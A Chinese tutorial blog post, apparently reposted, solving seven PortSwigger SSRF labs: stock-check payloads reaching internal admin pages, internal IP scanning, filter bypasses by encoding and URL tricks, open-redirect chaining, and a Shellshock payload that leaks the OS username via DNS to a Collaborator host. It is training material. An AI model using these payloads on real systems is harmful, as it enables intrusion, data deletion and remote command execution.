【burpsuite安全练兵场-服务端9】服务端哀求伪造SSRF漏洞-7个实行(全)
https://img-blog.csdnimg.cn/2e86bda3ff034c71920f2f40732c3929.gif前言:
https://img-blog.csdnimg.cn/c2dfbe518f7d43a2978e4e6f1bfd5ea1.gif介绍:
https://img-blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png博主:网络安全范畴狂热爱好者(允许在CSDN永世无偿分享文章)。
https://img-blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png殊荣:CSDN网络安全范畴优质创作者,2022年双十一业务安全守卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防天下等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。
https://img-blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png善于:对于技术、工具、漏洞原理、黑产打击的研究。
https://img-blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.pngC站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、渺茫期。
https://img-blog.csdnimg.cn/9f7cfdd7c4294c9e9bff7ef35f552f0c.gif导读:
https://img-blog.csdnimg.cn/b1b5426baac44b97b68428245cc35d77.png面向读者:对于网络安全方面的学者。
https://img-blog.csdnimg.cn/19ea593260b84ec8b836a336326fa0cc.png本文知识点(读者自测):
(1)服务器端哀求伪造(SSRF)(√)
(2)SSRF常见攻击(√)
(3)绕过SSRF的平凡防御(√)
(4)盲SSRF漏洞(√)
(5)探求SSRF漏洞的隐藏攻击面(√)
目次
一、服务器端哀求伪造(SSRF)
1、SSRF简述:
2、影响
二、SSRF常见攻击
1、SSRF攻击服务器本身
实行1:针对本地服务器的根本SSRF
2、SSRF攻击其他后端系统
实行2:根本SSRF与另一个后端系统
三、绕过SSRF的平凡防御
1、SSRF具有基于黑名单的输入滤波器
实行3:SSRF具有基于黑名单的输入滤波器
2、SSRF具有基于白名单的输入过滤器
实行6:具有基于白名单的输入滤波器的SSRF
3、通过开放重定向绕过SSRF滤波器
实行4:SSRF通过开放重定向漏洞绕过过滤器
四、盲SSRF漏洞
1、简述:
2、影响:
3、发现和使用SSRF漏洞
实行5:带外检测的盲SSRF
实行7:使用Shellshock的盲SSRF
五、探求SSRF漏洞的隐藏攻击面
1、简述:
2、哀求中的部门URL
3、数据格式中的URL
4、SSRF通过Referer报头
一、服务器端哀求伪造(SSRF)
1、SSRF简述:
1、服务器端哀求伪造(也称为SSRF)是一个Web安全漏洞,允许攻击者诱使服务器端应用步伐向非预期位置发出哀求。
2、在典型的SSRF攻击中,攻击者大概会使服务器连接到组织基础设施中的仅限内部的服务。在其他环境下,它们大概会欺压服务器连接到任不测部系统,从而大概走漏授权凭据等敏感数据
3、SSRF攻击经常使用信托关系从易受攻击的应用步伐升级攻击并实行未经授权的操作。这些信托关系大概与服务器本身相关,也大概与同一组织内的其他后端系统相关。
2、影响
1、成功的SSRF攻击通常会导致未经授权的操作或对组织内数据的访问,无论是在易受攻击的应用步伐本身还是在应用步伐可以与之通讯的其他后端系统上。在某些环境下,SSRF漏洞大概允许攻击者实行任意下令。
2、导致连接到外部第三方系统的SSRF漏洞使用大概会导致恶意的向前攻击,这些攻击似乎源自托管易受攻击的应用步伐的组织。
二、SSRF常见攻击
1、SSRF攻击服务器本身
1、在针对服务器本身的SSRF攻击中,攻击者诱使应用步伐通过其环回网络接口向托管应用步伐的服务器发出HTTP哀求。这通常涉及提供一个带有主机名的URL,如127.0.0.1(指向环回适配器的生存IP所在)或localhost(同一适配器的常用名称)2、例如一个购物应用步伐,它允许用户查看某个商品在特定商店中是否有库存。要提供库存信息,应用步伐必须查询各种后端REST API,具体取决于所涉及的产品和商店。该函数是通过前端HTTP哀求将URL传递给相关后端API端点来实现的。
当用户查看商品的库存状态时,浏览器会发出如下请求:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1这将导致服务器向指定的URL发出请求,检索库存状态,并将其返回给用户。
在这种情况下,攻击者可以修改请求以指定服务器本身的本地URL。例如:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://localhost/admin
(服务器将获取/admin URL的内容并将其返回给用户)
2、现在攻击者可以直接访问/admin URL。但是管理功能通常只有经过身份验证的得当用户才能访问。因此,直接访问URL的攻击者不会看到任何感爱好的内容。但假如对/admin URL的哀求来自本地计算机本身,则会绕过正常的访问控制。应用步伐赠款对管理功能的完全访问权限,由于哀求似乎来自受信托的位置。
3、应用步伐以这种方式运行,并且隐式地信托来自本地计算机的哀求的原因:
1、访问控制检查可以在位于应用服务器前面的不同组件中实现。当重新建立到服务器本身的连接时,将跳过检查。
2、出于灾难恢复的目的,应用程序可能允许来自本地计算机的任何用户在不登录的情况下进行管理访问。这为管理员提供了一种在丢失凭据时恢复系统的方法。这里的假设是只有完全信任的用户直接来自服务器本身。
3、管理界面可能正在侦听与主应用程序不同的端口号,因此用户可能无法直接访问。这种范例的信托关系,此中来自本地呆板的哀求与平凡哀求的处理方式不同,通常使SSRF成为一个严肃的漏洞。
4、涉及实行:
实行1:针对本地服务器的根本SSRF
实行1:针对本地服务器的根本SSRF
信息:
本实行具有从内部系统获取数据的库存检查功能。
要解决实行问题,更改库存检查URL以访问管理界面http://localhost/admin,并删除用户carlos
part1:
浏览到/admin,发现您无法直接访问管理页面
https://img-blog.csdnimg.cn/97ed8c36e46d4e0abd9edde8c086a358.png
part2:
访问一个产品,点击"检查库存",拦截哀求,并将其发送到repeater
https://img-blog.csdnimg.cn/123ec1e15f3c4fd69b2010055e346e9e.png
将stockApi参数中的URL更改为http://localhost/admin(将显示管理界面)https://img-blog.csdnimg.cn/0ae5c18b8b9d42be98c1367b267363a2.png
读取HTML以标识要删除目标用户的URL,该URL为:
http://localhost/admin/delete?username=carloshttps://img-blog.csdnimg.cn/d91cdb9b9f504f999282a45b825e8599.png
在stockApi参数中提交此URL,以传递SSRF攻击。
https://img-blog.csdnimg.cn/5ff303a1f6de4309a805581ace9c596e.png
刷新页面
https://img-blog.csdnimg.cn/8051496b7c154b0485a54c72d4273c5d.png
2、SSRF攻击其他后端系统
1、另一种范例的信托关系经常伴随着服务器端哀求伪造而出现,即应用服务器能够与用户无法直接访问的其他后端系统交互。这些系统通常具有不可路由的私有IP所在。由于后端系统通常受网络拓扑的保护,因此它们的安全性通常较弱。在很多环境下,内部后端系统包含敏感功能,能够与系统交互的任何人都可以在不进行身份验证的环境下访问这些功能。
2、假设后端URL www.example.com处有一个管理界面https://192.168.0.68/admin
攻击者可以通过提交以下请求利用SSRF漏洞访问管理界面
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://192.168.0.68/admin
3、涉及实行:
实行2:根本SSRF与另一个后端系统
实行2:根本SSRF与另一个后端系统
信息:
这个实行室有一个库存检查功能,可以从内部系统中获取数据
要解决这个问题,使用库存检查功能扫描内部192.168.0.X 范围,找到端口8080上的管理界面,然后用它删除用户 Carlos
part1:
访问一个产品,点击"检查库存",在Burp Suite中拦截哀求
https://img-blog.csdnimg.cn/fef80bde3f3a4a5783b5131c0e637691.png
part2:
进行攻击
并将其发送到Burp入侵者
先"Clear §",将 stockApi 参数更改为http://192.168.0.1:8080/admin
然后突出显示 IP 所在的最后八位数(数字1) ,点击Add§
https://img-blog.csdnimg.cn/ce3cd58b9dd942ef931938715142746d.png
Payloads设置,将有用负载范例更改为Numbers,并在"From"、"To"和"Step"框中分别输入1、255和1
并单击"开始攻击"
https://img-blog.csdnimg.cn/c353d49fb5e042bd9d57e73074835a26.png
按状态代码升序对其进行排序,看到一个状态为200的条目,此中显示了一个管理界面
https://img-blog.csdnimg.cn/f9d399603c854449a014db9c263666b0.png
右键此哀求,将其发送到Burp Repeater,并将stockApi中的路径更改为:
http://192.168.0.135:8080/admin/delete?username=carloshttps://img-blog.csdnimg.cn/0dc41c60a5994a41ba5f73cbe5fc48eb.png
https://img-blog.csdnimg.cn/b10d746a0dff454fbd6f2344f7acc1b9.png
三、绕过SSRF的平凡防御
1、SSRF具有基于黑名单的输入滤波器
1、有些应用步伐会制止包含主机名(如127.0.0.1和localhost)或敏感URL(如/admin)的输入。在这种环境下,通常可以使用各种技术绕过筛选器:
1、使用www.example.com的替代IP表示法127.0.0.1,例如2130706433、017700000001或127.1
2、注册您自己的域名,解析为127.0.0.1。您可以使用spoofed.burpcollaborator.net来实现此目的。
3、使用URL编码或大小写变化混淆被阻止的字符串。2、涉及实行:
实行3:SSRF具有基于黑名单的输入滤波器
实行3:SSRF具有基于黑名单的输入滤波器
信息:
本实行具有从内部系统获取数据的库存检查功能。
要解决实行问题,请更改库存检查URL以访问管理界面http://localhost/admin,并删除用户carlos
开发者已经摆设了两个弱的反SSRF防御,需要绕过它们
part1:
访问一个产品,点击"检查库存",使用BP拦截哀求,并将其发送到repeater
https://img-blog.csdnimg.cn/ff780a1e41d44231bb5675cd6c7028b8.png
改变stockApi参数为
http://127.0.0.1/错误提示,看出并观察到哀求被制止
https://img-blog.csdnimg.cn/7bcc491694644d9a8be66f8b577edcaf.png
part2:
绕过过滤器
通过将URL更改为
http://127.1/https://img-blog.csdnimg.cn/b637bd39aa63464091d4c149b872628a.png
将URL更改为
http://127.1/admin并观察到该URL再次被制止
https://img-blog.csdnimg.cn/4c98729c1aba4f998faee394ba344d36.png
将"a"进行双URL编码为%2561
http://127.1/%2561dminhttps://img-blog.csdnimg.cn/8e223ca1853b417ba03ef6bc567ebc7f.png
/admin/delete?username=carlospart3:
完成实行
以访问管理界面并删除目标用户
http://127.1/%2561dmin/delete?username=carlos https://img-blog.csdnimg.cn/9a371a82b6034ab0965c114cd10d0dc5.png
https://img-blog.csdnimg.cn/0f531e3e282940738033bca8ec581bd2.png
2、SSRF具有基于白名单的输入过滤器
1、某些应用步伐只允许与允许值的白名单匹配、以其开头或包含其的输入。在这种环境下,有时可以使用URL分析中的不一致性来绕过过滤器。
URL规范包含许多在实现对URL的即席解析和验证时容易被忽略的特性:
1、可以使用@字符在主机名之前的 URL 中嵌入凭据。 例如:
https://expected-host(预期主机)@evil-host(恶意主机)
2、可以使用 # 字符来表示 URL 片段。例如:
https://evil-host(恶意主机)#expected-host(预期主机)
3、可以利用DNS命名层次结构将所需的输入放入您控制的完全限定DNS名称中。例如:
https://expected-host.evil-host
4、可以对字符进行URL编码以混淆URL分析代码。如果实现筛选器的代码与执行后端HTTP请求的代码处理URL编码的字符的方式不同,则这一点特别有用
5、可以将这些技术结合使用涉及实行:
实行6:具有基于白名单的输入滤波器的SSRF
实行6:具有基于白名单的输入滤波器的SSRF
信息:
本实行具有从内部系统获取数据的库存检查功能。
要解决实行问题:更改库存检查URL以访问管理界面http://localhost/admin,并删除用户carlos
开发者已经摆设了一个反SSRF的防御,需要绕过它。
part1:
访问一个产品,点击"检查库存",BP拦截哀求,并将其发送到repeater
https://img-blog.csdnimg.cn/5515e16419084007b73cb21847254798.png
将stockApi参数中的URL更改为
http://127.0.0.1/然后观察应用步伐是否正在分析URL、提取主机名并根据白名单对其进行验证。
https://img-blog.csdnimg.cn/77d737fa6bcd45abac9c707c72d73315.png
将URL更改为
http://username@stock.weliketoshop.net/并观察其是否被担当,结果表明URL分析器支持嵌入式凭据
https://img-blog.csdnimg.cn/1c90cfb6f382424e85495591e24582e7.png
在用户名后附加一个#,观察URL被拒绝
https://img-blog.csdnimg.cn/6574068a7aea44e8b34bb4705d46f4e0.png
双URL将#编码为%2523,并观察非常可疑的“Internal Server Error”响应,该响应指示服务器大概已实行连接到“username”
https://img-blog.csdnimg.cn/7e3ed317c14448b6b23c0f5a5bbef41d.png
part2:
完成实行
要访问管理界面并删除目标用户,将URL更改为:
http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carloshttps://img-blog.csdnimg.cn/d76d84ccebd949cfb426161e70834da3.png
https://img-blog.csdnimg.cn/3665dbb6ade74a3d8978bc1751ea39b9.png
3、通过开放重定向绕过SSRF滤波器
1、有时可以通过使用开放的重定向漏洞来绕过任何范例的基于过滤器的防御。
2、假设用户提交的URL经过严格验证,以防止对SSRF行为的恶意使用。但允许其URL的应用步伐包含一个开放的重定向漏洞。假如用于使后端HTTP哀求支持重定向的API,则可以构造一个满足过滤器的URL,并将哀求重定向到所需的后端目标
例如,假设应用程序包含一个开放的重定向漏洞,其中以下URL:
/product/nextProduct?currentProductId=6&path=http://evil-user.net
返回重定向到:
http://evil-user.net3、可以使用开放重定向漏洞绕过URL过滤器,并使用SSRF漏洞进行攻击
例如:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin这个SSRF攻击之所以有用,是由于应用步伐首先验证提供的stockAPI URL是否在允许的域中,它确实是。然后应用步伐哀求提供的URL,这将触发打开重定向。它遵循重定向,并向攻击者选择的内部URL发出哀求
4、涉及实行:
实行4:SSRF通过开放重定向漏洞绕过过滤器
实行4:SSRF通过开放重定向漏洞绕过过滤器
信息:
这个实行室有一个库存检查功能,可以从内部系统获取数据
要解决这个实行室:改变库存检查的 URL,以访问 http://192.168.0.12:8080/admin 的管理界面,并删除用户 carlos
库存检查器被限制为只能访问本地应用步伐,因此需要首先找到一个影响应用步伐的打开重定向
part1:
访问一个产品,点击"检查库存",使用BP拦截哀求,并将其发送到repeater
https://img-blog.csdnimg.cn/ac857cc3806645e4a0c57673f8997839.png
实行篡改stockApi参数,观察到无法使服务器直接向其他主机发出哀求
https://img-blog.csdnimg.cn/00ea7fee24aa4733a6a78ef9d58ba88a.png
part2:
重定向功能
单击"next product"并观察到path参数被放置到重定向响应的Location头中,从而导致打开重定向
https://img-blog.csdnimg.cn/99884363f598427b914811649f92002c.png
发送到repeater
创建一个使用开放重定向漏洞的URL,重定向到管理界面,并将其输入股票检查器上的stockApi参数:
/product/nextProduct?path=http://192.168.0.12:8080/adminhttps://img-blog.csdnimg.cn/f57532e5de764047adc302f4c4f24569.png
跟随重定向并显示管理页面
(但是重定向没有真真的被实行)
https://img-blog.csdnimg.cn/7df441d00b21499ca832a916ff8546d9.png
part3:
添加重定向参数,并使用其他方式提交(由于GET提交的重定向会检查参数)
https://img-blog.csdnimg.cn/12d0e5fceef54177b126ed0e1965d94d.png
https://img-blog.csdnimg.cn/26bb82d401dd4e9d9e6fa17c2dc35617.png
(这一过程中测试了很多环境)
如(失败的):
https://img-blog.csdnimg.cn/9415fb4b06d242bc905a35983e5f9ae7.png
part4:
管理页面
假如失败(注意是cookie的问题,重新拦截发包)
请求头:
POST /product/stock HTTP/1.1
请求数据:
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin
https://img-blog.csdnimg.cn/f78ba2e2ea4d4181abf39f7c901a1057.png
part5:
完成实行
修改路径以删除目标用户
https://img-blog.csdnimg.cn/f17ec4c42409454f9f2bc5dac228a9a6.png
/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carloshttps://img-blog.csdnimg.cn/28ab7a58f02e4451b6e3e730c5a05ee0.png
https://img-blog.csdnimg.cn/276920d3d16a458c9c3a085555ca97ba.png
四、盲SSRF漏洞
1、简述:
1、当应用步伐被诱导向提供的URL发出后端HTTP哀求,但来自后端哀求的响应没有在应用步伐的前端响应中返回时,就会出现盲SSRF漏洞。
2、盲SSRF通常更难被使用,但有时会导致在服务器或其他后端组件上完全长途实行代码。
2、影响:
盲目SSRF漏洞的影响通常低于完全知情的SSRF漏洞,由于它们是单向的。固然在某些环境下可以使用它们来实现完全的长途代码实行,但不能轻易使用它们来从后端系统检索敏感数据。
3、发现和使用SSRF漏洞
1、检测盲SSRF漏洞的最可靠方法是使用带外(OAST)技术。这涉及到实行触发对您控制的外部系统的HTTP哀求,并监视与该系统的网络交互。
2、使用带外技术最简单、最有用的方法是使用Burp Collaborator。您可以使用Burp Collaborator客户机生成唯一的域名,将这些域名以有用负载的情势发送到应用步伐,并监视与这些域的任何交互。假如观察到来自应用步伐的传入HTTP哀求,则它轻易受到SSRF攻击。
3、在测试SSRF漏洞时,通常会观察到针对所提供Collaborator域的DNS查找,但没有后续HTTP哀求。发生这种环境的原因通常是应用步伐试图向域发出HTTP哀求,这会导致初始DNS查找,但实际的HTTP哀求被网络级过滤制止。基础设施允许出站DNS流量是相对常见的,由于这是很多目的所需要的,但会制止到不测目的地的HTTP连接。4、简单地识别瞽者SSRF易损性可以触发带外HTTP哀求的漏洞本身并不提供攻击途径。由于无法查看后端哀求的响应,因此不能使用该行为来浏览应用服务器可以访问的系统上的内容。但是,仍旧可以使用它来探测服务器本身或其他后端系统上的其他漏洞。您可以盲目地扫描内部IP所在空间,发送旨在检测已知漏洞的有用负载。假如这些有用负载还采用了盲带外技术,那么您大概会发现未打补丁的内部服务器上存在严肃漏洞。
5、使用SSRF漏洞的另一个途径是诱使应用步伐连接到攻击者控制下的系统,并向建立连接的HTTP客户端返回恶意响应。假如可以使用服务器HTTP实现中的严肃客户端漏洞,则大概能够在应用步伐基础布局中实现长途代码实行。
6、涉及实行:
实行5:带外检测的盲SSRF
实行7:使用Shellshock的盲SSRF
实行5:带外检测的盲SSRF
信息:
本网站使用分析软件,当产品页面加载时,该软件会获取Referer标题中指定的URL。
要解决实行:使用此功能向公共Burp Collaborator服务器发出HTTP哀求。
part1:
访问一个产品,在Burp Suite中拦截哀求,并将其发送到Burp Repeater
https://img-blog.csdnimg.cn/5a189b40bf024f8e9f72f7f097253429.png
part2:
使用BP提供的服务器客户端
BP选项卡---BC客户端---复制服务器URL
https://xqrbsy7k0bvri28avnpps3ddb4hu5j.burpcollaborator.nethttps://img-blog.csdnimg.cn/d66f40a95ea140698154788228e1c092.png
https://img-blog.csdnimg.cn/90a08e1672e74631ab3f876022c8624b.png
以使用Burp Collaborator生成的域替换原始域(Referer),发送哀求
https://img-blog.csdnimg.cn/29594005299b4c80921ecf53d9528bdb.png
转到Collaborator选项卡,再刷新,查看交互信息(看到一些DNS和HTTP交互,这些交互是应用步伐由于负载而启动的)
https://img-blog.csdnimg.cn/2e3be6c697ad45778619a69b5ab01d2e.png
https://img-blog.csdnimg.cn/39579dd2b7024cd88fb6216587d7e7a0.png
实行7:使用Shellshock的盲SSRF
信息:
本网站使用分析软件,当产品页面加载时,该软件会获取Referer标题中指定的URL。
要解决实行问题,请使用此功能对端口8080上的192.168.0.X范围内的内部服务器实行SSRF盲攻击。在盲目攻击中,对内部服务器使用Shellshock有用负载以走漏操作系统用户的名称
part1:
在Burp Suite Professional中,从BApp Store安装"Collaborator Everywhere"扩展
https://img-blog.csdnimg.cn/57a8b9c95345420883c896573f289bd2.png
part2:
插件的检测
将实行室域添加到Burp Suite的目标范围,以便Collaborator Everywhere将其作为目标。
https://img-blog.csdnimg.cn/5e875102185547e59f2d42b466c6f788.png
浏览网站,当加载产品页面时,它通过Referer头触发了与Burp Collaborator的HTTP交互
https://img-blog.csdnimg.cn/d270396d3aab466ab827de8b7375211d.png
观察HTTP交互在HTTP哀求中包含User-Agent字符串。将对产品页面的哀求发送给Burp Intruder
https://img-blog.csdnimg.cn/76b61a0490d745a295ca7a1642ec3948.png
part3:
ssrf盲测
使用Burp Collaborator 客户端生成唯一的 Burp Collaborator 有用载荷,并将其放入以下 Shellshock 有用载荷中
https://img-blog.csdnimg.cn/69d2cb8d2d3b44e5949f0b4eb234be10.png
() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN
我的是:
() { :; }; /usr/bin/nslookup $(whoami).87datwvawy02yijyhbt67qkzfqlh96.burpcollaborator.net
单击“clear §”,更改 Referer 标头,http://192.168.0.1:8080然后突出显示 IP 所在的最后一个八位字节(数字1),单击“添加 §”
https://img-blog.csdnimg.cn/ae667d79d8044c7ebc785726bcd219bb.png
切换到Payloads选项卡,将有用负载范例更改为Numbers,并在"From"、"To"和"Step"框中分别输入1、255和1(单击"开始攻击")
https://img-blog.csdnimg.cn/e6d0131f14cf4d9db8877ff1ffe9cf12.png
攻击完成后,返回Collaborator选项卡,然后单击"立即轮询"。应该看到一个DNS交互,它是由被成功的盲SSRF攻击击中的后端系统发起的。操作系统用户的名称应显示在DNS子域中。
(假如始终没有结果,考虑是否是cookie逾期,换一个cookie;或者重新复制一个BP客户端URL)
https://img-blog.csdnimg.cn/80b474ffc7014d88915c29fcf403c238.png
https://img-blog.csdnimg.cn/fcdd702b812b4992a5bb56121eac859c.png
part5:
完成实行
输入操作系统用户的名称
https://img-blog.csdnimg.cn/e45dea4b084c4a109749aa8f6bb890c7.png
https://img-blog.csdnimg.cn/e276dfc52f9849dfa054669530edb269.png
https://img-blog.csdnimg.cn/af8d680a3d564599873c679ff1308043.png
五、探求SSRF漏洞的隐藏攻击面
1、简述:
很多服务器端哀求伪造漏洞相对轻易发现,由于应用步伐的正常通讯涉及包含完备URL的哀求参数。SSRF的其他例子更难找到。
2、哀求中的部门URL
有时,应用步伐只将主机名或URL路径的一部门放入哀求参数中。然后,提交的值在服务器端合并到哀求的完备URL中。假如该值很轻易被识别为主机名或URL路径,则潜在的攻击面大概很显着。然而,作为完备SSRF的可使用性大概会受到限制,由于您无法控制所哀求的整个URL。
3、数据格式中的URL
一些应用步伐传输数据的格式的规范允许包含数据分析器大概会哀求的格式的URL。一个显着的例子是XML数据格式,它已广泛用于Web应用步伐中将布局化数据从客户机传输到服务器。当应用步伐担当XML格式的数据并对其进行分析时,它大概轻易受到XXE注射液,并反过来轻易受到SSRF通过XXE。我们将在查看时更详细地讨论这一点XXE注射液脆弱性。
4、SSRF通过Referer报头
一些应用步伐使用服务器端分析软件来跟踪访问者。该软件通常记录哀求中的Referer头,由于这对于跟踪传入链接特别有用。分析软件通常会访问出现在Referer标题中的任何第三方URL。这通常用于分析引用站点的内容,包括传入链接中使用的锚文本。因此,Referer报头通常代表SSRF漏洞的有用攻击面。见盲SSRF漏洞有关Referer标头漏洞的示例。
https://img-blog.csdnimg.cn/7d62be979184459ab44139ed85f387fe.png
https://img-blog.csdnimg.cn/0797a1b4a28e49479db240e038a7969d.png网络安全三年之约
https://img-blog.csdnimg.cn/0052aabacbb147b482912c9fe1950f56.pngFirst year
把握各种原理、不断打新的靶场
https://img-blog.csdnimg.cn/6b308c9501174788aa24fa4e5ea8fdd2.png目标:edusrc、cnvd
主页 | 教育漏洞报告平台 (sjtu.edu.cn)https://src.sjtu.edu.cn/https://www.cnvd.org.cnhttps://www.cnvd.org.cn/
https://img-blog.csdnimg.cn/8439bb91fdfb4e739bacba4c96b9fb17.pngsecond year
不断学习、提升技术运用技巧,研究各种新平台
开始建立本身的渗透体系
https://img-blog.csdnimg.cn/3bc7983d3bac437fbcf8b3530e3ec8d3.png目标:众测平台、企业src应急响应中心
众测平台URL漏洞盒子漏洞盒子 | 互联网安全测试众测平台火线安全平台火线安全平台漏洞银行BUGBANK 官方网站 | 领先的网络安全漏洞发现品牌 | 开放安全的提出者与提倡者 | 创新的漏洞发现平台360漏洞众包响应平台360漏洞云漏洞众包响应平台补天平台(奇安信)补天 - 企业和白帽子共赢的漏洞响应平台,资助企业建立SRC春秋云测首页雷神众测(可信众测,安恒)雷神众测 - BountyTeam云众可信(启明星辰)云众可信 - 互联网安全服务引领者ALLSECALLSEC360众测360众测平台看雪众测(物联网)看雪渗透测试服务CNVD众测平台网络安全众测平台工控互联网安全测试平台CNCERT工业互联网安全测试平台慢雾(区块链)Submit Bug Bounty - SlowMist Zone - Blockchain Ecosystem Security Zone平安汇聚http://isrc.pingan.com/homePage/index
互联网大厂URL阿里https://asrc.alibaba.com/#/腾讯https://security.tencent.com/百度https://bsrc.baidu.com/v2/#/home美团https://security.meituan.com/#/home360https://security.360.cn/网易https://aq.163.com/字节跳动https://security.bytedance.com/京东https://security.jd.com/#/新浪http://sec.sina.com.cn/微博https://wsrc.weibo.com/搜狗http://sec.sogou.com/金山办公https://security.wps.cn/有赞https://src.youzan.com/
https://img-blog.csdnimg.cn/18b63058b35848b19967730eb49fcb45.pngThird Year
学习最新的知识,建全本身的渗透体系
https://img-blog.csdnimg.cn/7ccb45a55d5244edad5a9a1fabc55f08.png目标:到场护网(每一个男孩子心中的梦想)
时间:一般5月面试,6/7月开始(持续2-3周)
分类:国家级护网、省级护网、市级护网、庞大节日护网(如:建党、冬奥等)
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]